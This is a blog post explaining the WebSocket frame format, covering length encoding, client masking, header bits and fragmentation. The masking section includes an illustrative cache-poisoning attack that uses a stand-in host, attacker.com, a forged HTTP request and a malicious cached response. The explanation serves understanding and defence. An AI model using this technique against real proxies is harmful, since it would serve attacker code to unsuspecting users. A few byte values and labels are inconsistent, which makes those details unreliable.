The WebSocket protocol explained

WebSockets are great: they provide a persistent two-way communication channel over a single TCP connection. They allow for real-time data exchange so they're used in chat, collaborative tools, and some AI APIs, among other things.

I recently wrote a WebSocket parser for Subtrace, and was surprised at how simple the (base) protocol is. The RFC felt almost... readable. The message format does just what it needs to do, and no more.

If you just want to play around with a WebSocket encoder, there's one at the bottom of the page.

WebSocket communication is built on a simple structure: both sides of the connection exchange messages, and each message is made up of one or more frames. Let's start by assuming messages are just single frames, and we'll build from there.

The basics#

Here's a simple (but valid!) WebSocket message that says "Hello":

81
header
05
len
48 65 6c 6c 6f
payload

Ignoring the header byte (we'll get to it later), this is literally just the message length (5) followed by the payload ("Hello" in UTF-8). Simple, right?

Okay, the full story is a bit more than that.

Masking#

A WebSocket client MUST mask (scramble) all the messages it sends to the server. If you're like me and you're wondering how "client" and "server" apply to WebSockets- the client initiates the connection with an HTTP request, and the server responds with a  101 Switching Protocols  before upgrading to WebSocket.

Masking requires a 4 byte masking key, so let's use a1 b2 c3 d4. Here's what our "Hello" message looks like now:

81
header
85
mask+len
a1 b2 c3 d4
masking key
e9 d7 af a8 ab
masked payload

The masked payload is obtained by XORing the original payload "Hello" with the masking key one byte at a time, repeating the masking key as necessary.

"Hello"
48
65
6c
6c
6f
Masking key
a1
b2
c3
d4
a1
Masked payload
e9
d7
af
a8
ce
But why MUST client → server messages be masked?

It's a bit kludgy, but it was a safety measure against cross-protocol attacks back when WebSockets were relatively new.

Imagine attacker.com opens a WebSocket connection on the browser to its own server. It then sends a WebSocket message that looks like a HTTP GET request:

                    
                        // on the user's browser
const socket = new WebSocket("ws://attacker.com");
socket.onopen = () => socket.send(
  "GET /jquery.min.js HTTP/1.1\r\n" +
  "Host: cdn.jquery.com\r\n" +
  "User-Agent: Mozilla/5.0\r\n" +
  "Accept: */*\r\n" +
  "Connection: keep-alive\r\n\r\n"
);

If there's no masking, these bytes are sent verbatim over the wire by the browser. If there's a caching proxy that doesn't parse websocket traffic correctly, it treats this as a legitimate HTTP request.

Now attacker.com sends back a websocket message that looks like a HTTP response:

HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 1337
Cache-Control: public, max-age=86400

alert('pwned');

The proxy caches this since it looks like a valid HTTP response. The next time a user requests cdn.jquery.com/jquery.min.js, they are served the malicious version from the cache.

To prevent this, each client → server frame is masked with a different randomly generated key. This prevents HTTP proxies from accidentally intepreting these bytes as anything else.

That being said, masking is less critical than it used to be:

  • HTTPS is a lot more widespread now, and the encryption prevents proxies from looking inside your traffic.
  • Modern proxies are WebSocket aware, and don't try to parse WebSocket messages as anything else.

(Note that server → client frames aren't masked - this risk only exists in browser-initiated traffic. In fact server → client frames MUST NOT be masked.)

Notice that the second byte went from 05 to 85 even though the length of the message hasn't changed. It turns out the most significant bit (MSB) of this byte tells us whether the payload is masked. The remaining 7 bits give us the payload length.

Well, kind of.

Bigger Frames#

Using 7 bits for the payload length allows us to specify a payload that's at most 127 bytes. What if we need more than that?

Let's call that 7-bit integer val (so the full byte is mask+val). Depending on what val is, there are different ways to represent the payload length:

This means you could technically encode a 263-1 byte (9.2 exabyte) message in one single frame. But you'll pretty much never see such large messages in practice, since most WebSocket libraries buffer entire messages in memory. Besides, there are other ways to encode long messages.

Fragmentation, Flags, and Frames#

As mentioned earlier, WebSocket messages can span multiple frames. When that happens, the individual payloads from each frame are concatenated to get the complete message. For example, if a WebSocket client receives these two frames in this order:

01
header
06
mask+len
48 65 6c 6c 6f 2c
payload ("Hello ")
80
header
06
mask+len
77 6f 72 6c 64 21
payload ("world!")

The client reads a single message "Hello world!". This also works with masked frames- just unmask before concatenating.

If a message can have multiple frames, what dictates its boundaries? It's finally time to talk about that header byte. Let's look at the structure of the header, using the headers from the two frames above as examples:

01
header
0
FIN
0
RSV1
0
RSV2
0
RSV3
0001
opcode
80
header
1
FIN
0
RSV1
0
RSV2
0
RSV3
0000
opcode

FIN: If set, this is the final frame in a message. This is how message boundaries are determined.

RSV1, RSV2, RSV3: These three bits are "reserved." They're all 0 in most normal WebSocket traffic. We'll ignore these for now but maybe return to them another day when we talk about compression.

Opcode: These 4 bits tell us what kind of frame this is.

And that's (almost) all there is to it! There's more to talk about like compression and how a WebSocket connection is even established, but we'll leave those for another time.

Play around!#

Generate your own WebSocket frames. Tap or hover over each set of bytes to see what they represent.

Note: I didn't cover compression here, but you can toggle it below to see how it affects things. As you might expect, it's most effective on compressible payloads like repeated strings.